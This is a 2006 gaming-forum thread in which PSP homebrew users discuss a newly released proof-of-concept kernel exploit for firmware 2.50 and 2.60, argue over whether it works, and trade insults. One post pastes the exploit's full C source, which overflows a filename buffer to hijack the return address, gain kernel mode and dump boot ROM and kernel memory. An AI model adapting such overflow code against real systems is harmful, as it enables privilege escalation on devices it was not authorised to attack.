QJ.NET | Videos | Forums | iPhone | MMORPG | Nintendo DS | Wii | PlayStation 3 | PSP | Xbox 360 | PC | Downloads | Contact Us
Forums | Gaming News | Videos | Downloads | Today's Posts | Mark Forums Read | Chat | FAQ | Members List | Contact

QJ.net Game Discussion - PSP, Xbox, Wii, PS3, PSP Homebrew, and PSP Guides

Go Back   QJ.net Game Discussion - PSP, Xbox, Wii, PS3, PSP Homebrew, and PSP Guides > Developers Corner > PSP Development, Hacks, and Homebrew > PSP Homebrew and Hacks Discussion
The above video goes away if you are a member and logged in, so log in now!

2.6 Kernel access - Proof of concept

This is a discussion on 2.6 Kernel access - Proof of concept within the PSP Homebrew and Hacks Discussion forums, part of the PSP Development, Hacks, and Homebrew category; http://forums.ps2dev.org/viewtopic.php?t=6091 Confirmed to work on: 2.50 and 2.60....

Reply
 
LinkBack Thread Tools
Old 06-27-2006, 12:40 PM   #1

My name is Mud
 
Join Date: Dec 2005
Posts: 1,538
Trader Feedback: 0
Default 2.6 Kernel access - Proof of concept

http://forums.ps2dev.org/viewtopic.php?t=6091

Confirmed to work on: 2.50 and 2.60.
__________________


Last edited by harleyg; 06-27-2006 at 02:02 PM..
hàrléyg² is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:43 PM   #2
 
ghostENVY's Avatar
 
Join Date: Jul 2005
Location: California
Posts: 2,408
Trader Feedback: 0
Default

maybe this can led to something since i trust anything the dev say
__________________
"The True Master Paralyzes His Opponent Leaving Him Vulnerable to Attack"
M.Shinoda
V.3.52 M33
[B][FONT="Times New Roman"]Thanks Deturb For Premium.[/FONT][/B]
[IMG]http://i118.photobucket.com/albums/o106/ghostENVY/Untitled-2.jpg[/IMG]
ghostENVY is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:44 PM   #3
 
Join Date: May 2006
Posts: 334
Trader Feedback: 0
Default

Interesting. Doesn't work on 2.01.
Smiffers is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:44 PM   #4

My name is Mud
 
Join Date: Dec 2005
Posts: 1,538
Trader Feedback: 0
Default

As said in irc, it can and will probably lead to flash0 access, and this will mean all 1.50 games / apps will work on 2.00+


edit:
Quote:
Interesting. Doesn't work on 2.01.
have you tried?
__________________

hàrléyg² is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:46 PM   #5
 
iball®'s Avatar
 
My Mood: Aggressive
Join Date: Oct 2005
Location: Interstates
Posts: 9,652
Trader Feedback: 0
Default

Yeah, riiiight....
So far there are three posts in that thread:

Quote:
Originally Posted by hitchhikr
http://perso.orange.fr/franck.charlet/Exploit_2.6.zip

There you have it boys.
Quote:
Originally Posted by Zettablade
eh? What is it? Is it safe?
Quote:
Originally Posted by harleyg
Yes, it is.
But no one says EXACTLY what it is or how it works. I don't trust it yet.
__________________
[spoiler=signature][center][img]http://i33.photobucket.com/albums/d75/iball2929/iballsig2fz.jpg[/img][/center]
[size=-2][center][b][color=purple]Nintendo DS WFC codes[/b][/color][/center][/size][size=-2][center][b][color=green]Mario Kart DS: 180448 583615 (I-Ball)[/color]
[color=blue]Animal Crossing: Town of Sampson 4853-9284-6519 (I-Ball)[/color]
[color=red]Metroid Prime Hunters: 5025 8054 3555[/size][/center][/color][size=-2][center]-----------------[/center][center][color=blue]Homebrew authors! If your software is based upon GPL code then you MUST release the modified source code you created the same time you release the binaries![/b][/size][/color][/center]
[size=-2][center][b]Supercard mini-SD w/2GB 150x Mini-SD card, SuperPass II, FlashMe v7 and an EFA Linker II GBA flashcart[/b][/center][/size][/spoiler]
iball® is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:46 PM   #6
 
ghostENVY's Avatar
 
Join Date: Jul 2005
Location: California
Posts: 2,408
Trader Feedback: 0
Default

has anyone tried already
__________________
"The True Master Paralyzes His Opponent Leaving Him Vulnerable to Attack"
M.Shinoda
V.3.52 M33
[B][FONT="Times New Roman"]Thanks Deturb For Premium.[/FONT][/B]
[IMG]http://i118.photobucket.com/albums/o106/ghostENVY/Untitled-2.jpg[/IMG]
ghostENVY is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:46 PM   #7
 
Join Date: May 2006
Posts: 334
Trader Feedback: 0
Default

Quote:
Originally Posted by harleyg
have you tried?
No... I just knew. YES I TRIED .
Quote:
As said in irc
What irc channel/network?
Smiffers is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:46 PM   #8
 
KlyNeR's Avatar
 
Join Date: Apr 2006
Location: Germany
Posts: 62
Trader Feedback: 0
Default

okay...corrupt data @2.01

I'll try now with eloader
KlyNeR is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:46 PM   #9

Rock Star
 

 
Join Date: Aug 2005
Location: CT| FW: 4.01 M33-2
Posts: 11,844
Trader Feedback: 0
Default

What exactly does the Proof of Concept do? How do we know it is actually accessing the kernel?
__________________

TeamOverload is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:47 PM   #10

My name is Mud
 
Join Date: Dec 2005
Posts: 1,538
Trader Feedback: 0
Default

iball, dont start.

not even going to argue with you.
__________________

hàrléyg² is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:48 PM   #11
 
slickpick's Avatar
 
Join Date: Jan 2006
Posts: 848
Trader Feedback: 0
Default

I have a 2.6.. how do I set it up?

just put the exploit with the eboot in the game folder?
__________________
Nintendo DS: R4
PSP: 4.01 m33-2 with 1.50 kernal addon
slickpick is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:48 PM   #12
 
Join Date: May 2006
Posts: 334
Trader Feedback: 0
Default

Quote:
Originally Posted by harleyg
iball, dont start.

not even going to argue with you.
You didn't answer my question .

Quote:
What irc channel/network?
Smiffers is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:48 PM   #13
 
KlyNeR's Avatar
 
Join Date: Apr 2006
Location: Germany
Posts: 62
Trader Feedback: 0
Default

ok, with eloader @2.01 it says:


game could not be startet...and then this errorcode
KlyNeR is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:49 PM   #14
 
iball®'s Avatar
 
My Mood: Aggressive
Join Date: Oct 2005
Location: Interstates
Posts: 9,652
Trader Feedback: 0
Default

Quote:
Originally Posted by harleyg
iball, dont start.

not even going to argue with you.
Then feel free to explain it. And don't ever think you can tell me what to do.
I'll wait until math or Fan chime in or someone at least explains it in DETAIL.
I detest these silly links to ZIP files without actually taking the time to EXPLAIN what the **** it does and how it does it.
__________________
[spoiler=signature][center][img]http://i33.photobucket.com/albums/d75/iball2929/iballsig2fz.jpg[/img][/center]
[size=-2][center][b][color=purple]Nintendo DS WFC codes[/b][/color][/center][/size][size=-2][center][b][color=green]Mario Kart DS: 180448 583615 (I-Ball)[/color]
[color=blue]Animal Crossing: Town of Sampson 4853-9284-6519 (I-Ball)[/color]
[color=red]Metroid Prime Hunters: 5025 8054 3555[/size][/center][/color][size=-2][center]-----------------[/center][center][color=blue]Homebrew authors! If your software is based upon GPL code then you MUST release the modified source code you created the same time you release the binaries![/b][/size][/color][/center]
[size=-2][center][b]Supercard mini-SD w/2GB 150x Mini-SD card, SuperPass II, FlashMe v7 and an EFA Linker II GBA flashcart[/b][/center][/size][/spoiler]
iball® is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:50 PM   #15
 
ghostENVY's Avatar
 
Join Date: Jul 2005
Location: California
Posts: 2,408
Trader Feedback: 0
Default

dont know since i dont have a 2.6 but it doesnt seem to hurt to try
__________________
"The True Master Paralyzes His Opponent Leaving Him Vulnerable to Attack"
M.Shinoda
V.3.52 M33
[B][FONT="Times New Roman"]Thanks Deturb For Premium.[/FONT][/B]
[IMG]http://i118.photobucket.com/albums/o106/ghostENVY/Untitled-2.jpg[/IMG]
ghostENVY is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:50 PM   #16

My name is Mud
 
Join Date: Dec 2005
Posts: 1,538
Trader Feedback: 0
Default

doesnt work on 2.01 then...

Quote:
okay...corrupt data @2.01
are you stupid?

anyway...
if you guys read the source, you would know.


also, its in the #pspdev channel.
__________________

hàrléyg² is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:51 PM   #17
 
Join Date: Sep 2005
Posts: 42
Trader Feedback: 0
Default

Quote:
Originally Posted by iball®
Yeah, riiiight....
So far there are three posts in that thread:
...

But no one says EXACTLY what it is or how it works. I don't trust it yet.
It's on ps2dev.org... , If it was posted here first then it would be ok to not trust it
sousuke is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:51 PM   #18
 
Join Date: May 2006
Posts: 334
Trader Feedback: 0
Default

Quote:
Originally Posted by harleyg
also, its in the #pspdev channel.
What network?
Smiffers is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:51 PM   #19
 
KlyNeR's Avatar
 
Join Date: Apr 2006
Location: Germany
Posts: 62
Trader Feedback: 0
Default

Quote:
Originally Posted by harleyg

are you stupid?

I tried it normal in XMB and with eloader...tell me how stupid I am if I can try another way
KlyNeR is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:51 PM   #20
 
torrobinson's Avatar
 
Join Date: Aug 2005
Location: Edmonton, Canada
Posts: 2,938
Trader Feedback: 0
Default

Quote:
Originally Posted by slickpick
I have a 2.6.. how do I set it up?

just put the exploit with the eboot in the game folder?
Probably...
let us know what happene!
__________________
[CENTER][img]http://img357.imageshack.us/img357/5953/torro5mb.gif[/img][/CENTER]
[CENTER][img]http://img98.imageshack.us/img98/9213/xbox360owner1nb.jpg[/img][/CENTER]
[CENTER][img]http://img98.imageshack.us/img98/6253/luminesaddict3bb.jpg[/img][/CENTER]
[center][img]http://f10.putfile.com/7/18321220157.jpg[/img][/CENTER]
[CENTER][URL=http://forums.qj.net/showthread.php?t=19128][COLOR=Magenta]¸,ø¤º°`¦°º¤ø,¸ Become premium! Support QJ.net! ¸,ø¤º°`¦°º¤ø,¸[/COLOR][/URL][/CENTER]
torrobinson is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:52 PM   #21
 

 
Join Date: Mar 2006
Location: LOLWUT
Posts: 2,625
Trader Feedback: 1
Default

I have dl'ed the 2.6 exploit, and it has the src with it. (I have 1.5)
Quote:
Originally Posted by The copy.c in the download
Code:
// -------------------------------------------
// Kernel access under firmware 2.6
// (and probably 2.01 & 2.5 aswell)
// * Proof of concept code *
// Written by hitchhikr / Neural.
// -------------------------------------------

// -------------------------------------------
// Include
#include <pspkernel.h>
#include <pspdisplay.h>
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>

PSP_MODULE_INFO("2.6ploitation", 0, 1, 1);
PSP_MAIN_THREAD_ATTR(THREAD_ATTR_USER);

// -------------------------------------------
// This one will be executed in kernel mode
void kernel_proc(void) {
	// Dump'em all - read access
	int handle = sceIoOpen("ms0:/boot.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, (void*) 0xBFC00000 , 0x100000);
	sceIoClose(handle);
	handle = sceIoOpen("ms0:/kmem.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, (void*) 0x88000000 , 0x400000);
	sceIoClose(handle);
	handle = sceIoOpen("ms0:/klib.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, (void*) 0x88800000 , 0x100000);
	sceIoClose(handle);

	// Check if we have write access
	unsigned int *probe = (unsigned int *) 0x883EFC40;
	probe[0] = 0x12345678;
	
	// This file must contain 0x12345678
	handle = sceIoOpen("ms0:/writeaccess.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, probe, 4);
	sceIoClose(handle);

	probe[0] = 0;

	for(;;) { }
}

// -------------------------------------------
// Program entry point
int main(int argc, char* argv[]) {
	int i;
   	int handle;
   
	char filename[256];
	unsigned int *dwfilename;
	// This address must *NOT* contains a 00
	unsigned int *loop = (unsigned int *) 0x9f02020;
	unsigned int *loopsrc = (unsigned int *) &kernel_proc;
	char *msg = "chhikr hitchhikr hitchhikr hitchhikr hitchik";

	sceKernelDcacheWritebackAll();

	// Copy the test code into a safe place
	for(i = 0; i < 100; i++) {
		loop[i] = loopsrc[i];
	}
	memset(filename, 0, sizeof(filename));
	// Fill it with **** (*MUST* be 44 bytes)
	for(i = 0; i < 44; i++) {
		filename[i] = msg[i];
	}
	// Own the $ra
	dwfilename = (unsigned int *) &filename[44];
	dwfilename[0] = (unsigned int) loop;
	// Complete the string
	filename[48] = ':';
	filename[49] = '\0';

	// We need this for some odd flushing (?) reasons
	handle = sceIoOpen("ms0:/odd.BIN", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_TRUNC, 0777);
	sceIoWrite(handle, dwfilename, 4);
	sceIoClose(handle);

	sceKernelLoadExec(filename, NULL); 	
	return(0);
}
I have NO idea whatsoever what this means, but mayb a more experinced dev could look at it.
--PSPduh
PSPduh is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:52 PM   #22
 
Kemps's Avatar
 
Join Date: Apr 2006
Location: MN
Posts: 207
Trader Feedback: 0
Default

so somebody can get smashgpsp to work for 2.6?!?!?
Kemps is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:52 PM   #23
 
iball®'s Avatar
 
My Mood: Aggressive
Join Date: Oct 2005
Location: Interstates
Posts: 9,652
Trader Feedback: 0
Default

Quote:
Originally Posted by sousuke
It's on ps2dev.org... , If it was posted here first then it would be ok to not trust it
DId you read my earlier post?
There's no explanation on what it does, how it works, or what it's supposed to be exploiting/bypassing.
Not wasting my time with it until the source is posted.
And no, I don't feel like taking the single EBOOT file and looking at it.
__________________
[spoiler=signature][center][img]http://i33.photobucket.com/albums/d75/iball2929/iballsig2fz.jpg[/img][/center]
[size=-2][center][b][color=purple]Nintendo DS WFC codes[/b][/color][/center][/size][size=-2][center][b][color=green]Mario Kart DS: 180448 583615 (I-Ball)[/color]
[color=blue]Animal Crossing: Town of Sampson 4853-9284-6519 (I-Ball)[/color]
[color=red]Metroid Prime Hunters: 5025 8054 3555[/size][/center][/color][size=-2][center]-----------------[/center][center][color=blue]Homebrew authors! If your software is based upon GPL code then you MUST release the modified source code you created the same time you release the binaries![/b][/size][/color][/center]
[size=-2][center][b]Supercard mini-SD w/2GB 150x Mini-SD card, SuperPass II, FlashMe v7 and an EFA Linker II GBA flashcart[/b][/center][/size][/spoiler]
iball® is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:52 PM   #24

My name is Mud
 
Join Date: Dec 2005
Posts: 1,538
Trader Feedback: 0
Default

Quote:
Originally Posted by Smith|
What network?
look on there f*cking site, jesus.

iball, read the god damn code.


im just reporting this, so yup i wont be posting in this thread now, ill just sit back and watch the noobs say OMGOMG ISOS!
__________________

hàrléyg² is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:53 PM   #25
 
slickpick's Avatar
 
Join Date: Jan 2006
Posts: 848
Trader Feedback: 0
Default

Okay I put the exploit folder with eboot (DIDNT MESS WITH THE MAKEFILE OR ANYTHING) ok i just tried it and all it did was say exit menu and then nothing happened.
__________________
Nintendo DS: R4
PSP: 4.01 m33-2 with 1.50 kernal addon
slickpick is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:54 PM   #26

My name is Mud
 
Join Date: Dec 2005
Posts: 1,538
Trader Feedback: 0
Default

god damn it... look on the memory stick, are there files there?

if so, you just created them in kernel mode.

like i said, its proof of concept.
__________________

hàrléyg² is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:55 PM   #27
 
ghostENVY's Avatar
 
Join Date: Jul 2005
Location: California
Posts: 2,408
Trader Feedback: 0
Default

i dont think it will work since it say load kernel which the psp 2.6 cant do as of now but hope that it does works so someday i can upgrade to 2.6
__________________
"The True Master Paralyzes His Opponent Leaving Him Vulnerable to Attack"
M.Shinoda
V.3.52 M33
[B][FONT="Times New Roman"]Thanks Deturb For Premium.[/FONT][/B]
[IMG]http://i118.photobucket.com/albums/o106/ghostENVY/Untitled-2.jpg[/IMG]
ghostENVY is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:55 PM   #28
 

 
Join Date: Mar 2006
Location: LOLWUT
Posts: 2,625
Trader Feedback: 1
Default

Quote:
Originally Posted by iball®
DId you read my earlier post?
There's no explanation on what it does, how it works, or what it's supposed to be exploiting/bypassing.
Not wasting my time with it until the source is posted.
And no, I don't feel like taking the single EBOOT file and looking at it.
Read my earlier post.
I posted the source that came with it.
--PSPduh
PSPduh is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:56 PM   #29
 
Kemps's Avatar
 
Join Date: Apr 2006
Location: MN
Posts: 207
Trader Feedback: 0
Default

iball i have the feeling nobody likes you...
and is there instructions on how to install and run and ****?
Kemps is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 06-27-2006, 12:56 PM   #30
I think I ripped my pants
 
whitehawk's Avatar
 
Join Date: Jul 2005
Real First Name: Matt
Location: Toronto
Just Played: Trials HD
Posts: 6,485
Trader Feedback: 0
Default

Quote:
Originally Posted by KlyNeR
I tried it normal in XMB and with eloader...tell me how stupid I am if I can try another way
It's cause he said it didn't work on 2.01, and now you're saying it's not working on 2.01..
whitehawk is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Tags
access , concept , kernel , proof

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off



All times are GMT -8. The time now is 04:05 AM.



Use of this Web site constitutes acceptance of the TERMS & CONDITIONS and PRIVACY POLICY
Copyright © 2009, QJ.NET. All Rights Reserved.
Contact Us